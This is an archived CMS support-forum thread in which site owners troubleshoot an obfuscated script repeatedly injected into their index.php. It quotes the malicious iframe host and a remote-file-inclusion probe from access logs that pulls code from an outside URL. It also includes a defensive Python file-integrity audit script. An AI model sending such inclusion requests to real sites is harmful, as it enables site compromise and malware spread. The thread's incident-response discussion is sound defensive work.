Dragonfly CMS v9 ⇒ Security v9 :: Archives ⇒ Hacked twice in 2 days [Gallery 1.5] :: Archived ⇒ Community Forums ⇒ CPG Dragonfly™ CMS

Archived ⇒ Hacked twice in 2 days [Gallery 1.5]


Someone is modifying my index.php and tacking an encoded script at the bottom:
<{script removed}
Anyone know how to deduce anything from this? I've used some of the built-in features to try and harden things up. I'm hoping it's a stupid cPanel or WHM vulnerability on our dedicated server. Ironically, we never use these things; I do everything from the command line or phpMyAdmin. This is on Lunarpages, which is about $130 a month for not that great of a machine. Sad

Cheers,

Ronin
Ronin Technologies
Dragonfly Google Maps Module

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
Ubuntu 14.04 / 2.4.7 / 5.5.37 / 5.5.9 / 9.4.0.0


The script will load an iframe with src of
58.65.235.153/~pozitivu/ice/index.php?

You might try upgrading all your server software as well as DragonflyCMS, with all DragonflyCMS and 3rd-party modules and blocks installed.

I really think it is an internal hacking attempt rather than an exploit of any PHP code; please check your ftp, ssh and apache logs.

http://dns-tools.domaintools.com/?q=58.65.235.153&m=dns wrote

DNS Lookup For 58.65.235.153

;; Answer received from 216.145.1.3 (105 bytes)
;;
;; HEADER SECTION
;; id = 8170
;; qr = 1 opcode = QUERY aa = 0 tc = 0 rd = 1
;; ra = 1 ad = 0 cd = 0 rcode = NXDOMAIN
;; qdcount = 1 ancount = 0 nscount = 1 arcount = 0

;; QUESTION SECTION (1 record)
;; 153.235.65.58.in-addr.arpa. IN PTR

;; ANSWER SECTION (0 records)

;; AUTHORITY SECTION (1 record)
235.65.58.in-addr.arpa. 10714 IN SOA ns1.hostfresh.com. us1core.hostfresh.com. (
2006101301 ; Serial
7200 ; Refresh
7200 ; Retry
1209600 ; Expire
86400 ) ; Minimum TTL

;; ADDITIONAL SECTION (0 records)

.:: I met php the 03 December 2003 :: Unforgettable day! ::.

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
CloudLinux / Apache 2.4 LSAPI / MySQLi 5.6 / PHP 5.6 / DCVS


Sorry, my footer was out of date. I'm actually running 9.1.2.5 CVS on it. We'll definitely be upgrading other stuff ASAP.

Cheers,

Ronin
Ronin Technologies
Dragonfly Google Maps Module

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
Ubuntu 14.04 / 2.4.7 / 5.5.37 / 5.5.9 / 9.4.0.0


Don't forget to check your logs as well, logs might tell you what happened.

.:: I met php the 03 December 2003 :: Unforgettable day! ::.

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
CloudLinux / Apache 2.4 LSAPI / MySQLi 5.6 / PHP 5.6 / DCVS


Unfortunately this is a javascript issue. The script is obfuscated and likely generated on the fly.

A complete review of how this code was XSS'd to your index.php is required to understand "IF" an exploit was used. Your browser could be adding this...

At this point I'd state that anyone with MSF or w3af could do this.

J.
j e r u v y a t y a h o o d o t c o m

Need help? Look here: www.dragonflycms.org/W...d=112.html
Need to chat? Look for me on irc.freenode.net

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
Ubuntu7.10/Debian3.1 - 2.2.3/1.3.37 - 5.0.38/4.0.27 - 5.2.1/4.4.7 - CVS/9.1.2}


Just suffered the same hack myself... again ;( This seems to happen to me every other month now. It has happened on previous versions of CPG and now even with the latest version. This has only happened to CPG.

I tried to look up any evidence in my logs... but unfortunately... they hit the site only an hour before it rotated and the info I needed was deleted.

I have logged into my cPanel and checked the options to archive these logs now, and am hoping maybe I can capture what they are doing (even though I will probably not understand it).

Wanna Play A Game ? | Jazz it up @ the JazzArcade | A Splash of FUN @ the Arcade Splash

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
nix/1.3.37/5.0.27/5.2.1/9something


scoopy, are you concerned about this?

Sorry to be so bold and brazen in my question but I really don't understand your post. You say this has happened to you but you do nothing about it.

If I was getting hacked every other month I'd be looking into it seriously. I would not allow my logs to be deleted. You should review how to deal with hackers/attackers before questioning getting hacked.

Many folks have liked this article and it may help you:

www.dragonflycms.org/F...=2864.html

In your case I don't know what to suggest other than wiping the site and starting from scratch. Ensure you know the extras you're adding in or installing are secure.

Audit your web host also, make sure they are not the ones getting hacked and they are simply modifying your existing pages so as to spread more malware.

Recent studies in malware show MANY 'so called trusted' sites, such as the recent Bank of India incident, are harboring malware. Using obfuscated javascript 'ensures' that the code is not detected easily by any anti-virus or anti-malware.

Performing frequent code audits can help detect and clean these types of issues from persisting. (Simply download your site then compare it against a fresh copy of the code or your backup)

So what would you like to do?

J.
j e r u v y a t y a h o o d o t c o m

Need help? Look here: www.dragonflycms.org/W...d=112.html
Need to chat? Look for me on irc.freenode.net

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
Ubuntu7.10/Debian3.1 - 2.2.3/1.3.37 - 5.0.38/4.0.27 - 5.2.1/4.4.7 - CVS/9.1.2}
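The "download your site and compare it against a fresh copy" audit suggested above, as an added example that is not from the thread or the Dragonfly project: it hashes a clean tree into a manifest, diffs the live tree against it, and separately flags any PHP file that carries a <script> or <iframe> tag after its last "?>", which is exactly the modification that produced the "unexpected '<'" parse error discussed here. The directory layout and sample index.php contents are constructed for the demo.

```python
import hashlib
import os
import re
import tempfile
# Hypothetical helper added for this thread (not Dragonfly code): an HTML tag
# after a PHP file's last "?>" is what caused the "unexpected '<'" parse error.
INJECTED_TAG = re.compile(rb"<\s*(script|iframe)\b", re.IGNORECASE)

def build_manifest(root):
    """Relative path -> sha256 of every file under root (the clean copy)."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as f:
                manifest[os.path.relpath(full, root)] = hashlib.sha256(f.read()).hexdigest()
    return manifest

def has_trailing_html(path):
    """True if a PHP file carries a <script>/<iframe> tag after its last '?>'."""
    with open(path, "rb") as f:
        data = f.read()
    cut = data.rfind(b"?>")
    tail = data[cut + 2:] if cut != -1 else data
    return INJECTED_TAG.search(tail) is not None

def audit(live_root, baseline):
    """Diff the live tree against a baseline manifest and flag injected PHP files."""
    live = build_manifest(live_root)
    rep = {"modified": [], "added": [], "injected": [], "missing": sorted(set(baseline) - set(live))}
    for rel, digest in live.items():
        if rel not in baseline:
            rep["added"].append(rel)
        elif baseline[rel] != digest:
            rep["modified"].append(rel)
        if rel.endswith(".php") and has_trailing_html(os.path.join(live_root, rel)):
            rep["injected"].append(rel)
    return rep

def demo():
    # Constructed sample: a clean index.php beside a live copy with a tag appended.
    clean = b"<?php\necho 'hello';\n?>\n"
    files = {"clean/index.php": clean,
             "live/index.php": clean + b"<script>x()</script>\n",
             "live/dropped.php": b"<?php phpinfo(); ?>"}
    with tempfile.TemporaryDirectory() as tmp:
        for rel, data in files.items():
            os.makedirs(os.path.join(tmp, os.path.dirname(rel)), exist_ok=True)
            with open(os.path.join(tmp, rel), "wb") as f:
                f.write(data)
        return audit(os.path.join(tmp, "live"), build_manifest(os.path.join(tmp, "clean")))
```

In practice the baseline manifest is built once from the untouched release or backup and stored off the web host, so that a compromised tree cannot also rewrite the hashes it is checked against.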


Sorry, every other month was an exaggeration (for this site alone).

I looked up the record created by the server's "error_log" file. (this is created because the script being added produces a parse/syntax error) The last time this "hack" occurred was about 5 months ago. Also, the logs have not been deleted. I had the option to save them deselected in cPanel... thus they were not being saved and were rotated on a daily basis.

I upgraded to version 9.1.2.1 after that and that was the last of this hack... or so I thought, until yesterday. Since then... it has happened 3 more times today.

Each time the same error shows up on the site:
Parse error: syntax error, unexpected '<' in /home/smyp/public_html/index.php on line 133
which provides me with the approximate time of the event.

I scoured the logs (raw, awstats, and webalizer) and the latest visitors log... but can not find any signs of any hacking attempts to account for this code being added to the index page. For example... the popular:
themes/coppercop/theme.php?THEME_DIR=http://www.tripod.com/bypassid.txt?
which has since been secured up... now only produces nothing except a 404 error.

I also have noted a lot of the following showing up:
http://showmeyourpix.com/coppermine/addfav/db_input.php
which also produces a 404 error.

Everything else seems to be either genuine visitors or SE traffic.

And I really doubt this has anything to do with the host. Their security is pretty tight... running things like phpsuexec and having user nobody disabled, etc. Plus, I would think there would be more than 1 case like this with them if there was a security problem on their end.

I am not sure where to go at this point to figure out how this is being done... so I can close this hole for good.

thanks,

Wanna Play A Game ? | Jazz it up @ the JazzArcade | A Splash of FUN @ the Arcade Splash

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
nix/1.3.37/5.0.27/5.2.1/9something


scoopy wrote
Sorry, every other month was an exaggeration (for this site alone).


Let's try to avoid exaggerations... it will haunt you.

I looked up the record created by the server's "error_log" file. (this is created because the script being added produces a parse/syntax error) The last time this "hack"


Can you define the 'hack'? I haven't seen anything except what you've posted below, and I'll come to that in a minute.

occurred was about 5 months ago.


Wow! So really we don't know anything relevant about the event since it's so old. Let's stick to current events then.

Also, the logs have not been deleted. I had the option to save them deselected in cPanel... thus they were not being saved and were rotated on a daily basis.


So you still have all the logs and everything since always?

I upgraded to version 9.1.2.1 after that and that was the last of this hack... or so I thought, until yesterday. Since then... it has happened 3 more times today.


Let's see the attacks... c'mon. We've seen them all... Smile

Each time the same error shows up on the site:
Parse error: syntax error, unexpected '<' in /home/smyp/public_html/index.php on line 133
which provides me with the approximate time of the event.


Ok, but this is not legit. You should not get a parse error on this page. Can you provide details of this and ensure it has not been modified? It would seem to me it has been. According to my copy of this file, which for the record is:

$Source: /cvs/html/index.php,v $

$Revision: 9.31 $
$Author: nanocaiordo $
$Date: 2006/11/11 03:12:21 $

And my line 133 is the last line in the file and contains nothing.


I scoured the logs (raw, awstats, and webalizer) and the latest visitors log... but can not find any signs of any hacking attempts to account for this code being added to the index page.


Again, this is illegit. You have a typo in your script. If you'd be so kind as to post the entire index.php file of yours here.

For example... the popular:
themes/coppercop/theme.php?THEME_DIR=http://www.tripod.com/bypassid.txt?
which has since been secured up... now only produces nothing except a 404 error.


As it should.

I also have noted a lot of the following showing up:
http://showmeyourpix.com/coppermine/addfav/db_input.php
which also produces a 404 error.


This I'm not following. Where do you see this? Can you provide the exact entry you're seeing?

Everything else seems to be either genuine visitors or SE traffic.

And I really doubt this has anything to do with the host. Their security is pretty tight... running things like phpsuexec and having user nobody disabled, etc. Plus, I would think their would be more than 1 case like this with them if their was a security problem on their end.


Sorry, this means nothing to me. Nobody is 100% secure. But I'd tend to agree with you unless they use cPanel or Plesk. But I will not go into details on these products.

I am not sure where to go at this point to figure out how this is being done... so I can close this hole for good.


Some simple things for starters. Do not allow uploading anywhere. Disable HTML email. Remove any themes that have not been given a good reference. Remove any code that pulls data from other sites that has not been cleaned properly.

As for more specifics unfortunately we need details. You have not disclosed anything known or unknown that could be considered an issue, let alone a 'hole'. Perhaps someone else may see something I've missed but we need to get the specifics from you that seem to be causing the problem.

A decent incident report would be a good start.

thanks

J.
j e r u v y a t y a h o o d o t c o m

Need help? Look here: www.dragonflycms.org/W...d=112.html
Need to chat? Look for me on irc.freenode.net

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
Ubuntu7.10/Debian3.1 - 2.2.3/1.3.37 - 5.0.38/4.0.27 - 5.2.1/4.4.7 - CVS/9.1.2}


I thought the OP had defined the results of this "hack" pretty clearly. I have been trying to figure out how someone is able to add code to my index file and thus fix the problem... as I am sure that was the same intention of the OP.

Yes... I still have the "error_log" and No... to any previous HTTP logs. Someone has again somehow modified my index file today and I found the same <script> added to the bottom of the index.

Line 133 was where this HTML code was added by the "script kiddy" which is what breaks the PHP code and produces the error message... instead of the IFRAME or redirection they had intended. The error is then logged and that is what gives me an approx. time of the "hack".

Anyway... I think I may have guessed what me and the OP had in common that could be the reason we both had this same problem and will upgrade that module we both are running on our sites.

Wanna Play A Game ? | Jazz it up @ the JazzArcade | A Splash of FUN @ the Arcade Splash

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
nix/1.3.37/5.0.27/5.2.1/9something


Guess it was not that module I updated yesterday... they did it again tonight.

So with everything updated and nothing showing in the logs --- where do I go from here ?

Wanna Play A Game ? | Jazz it up @ the JazzArcade | A Splash of FUN @ the Arcade Splash

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
nix/1.3.37/5.0.27/5.2.1/9something


I bet that you and your admins are still using the same password.

.:: I met php the 03 December 2003 :: Unforgettable day! ::.

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
CloudLinux / Apache 2.4 LSAPI / MySQLi 5.6 / PHP 5.6 / DCVS


NanoCaiordo wrote
I bet that you and your admins are still using the same password.

If so... wouldn't that leave something in the visitors log that would look like this:
127.0.0.1 - - [04/Oct/2007:01:21:29 +0000] "GET /admin.php HTTP/1.1" 403 3780 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
There was nothing like that in today's log.

Wanna Play A Game ? | Jazz it up @ the JazzArcade | A Splash of FUN @ the Arcade Splash

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
nix/1.3.37/5.0.27/5.2.1/9something


They usually get the password of the 1st created admin, and as far as I know a lot of people use the same password for ftp, pop, etc.

What I suggest you do is change all your passwords (df, ftp, ....) again.

See how it goes.

.:: I met php the 03 December 2003 :: Unforgettable day! ::.

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
CloudLinux / Apache 2.4 LSAPI / MySQLi 5.6 / PHP 5.6 / DCVS


OK... have changed all cPanel and DF admin passwords (BTW: just me)... and even the mySQL username and password. I used 3 different passwords too.

Will keep ya' all posted.

Wanna Play A Game ? | Jazz it up @ the JazzArcade | A Splash of FUN @ the Arcade Splash

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
nix/1.3.37/5.0.27/5.2.1/9something
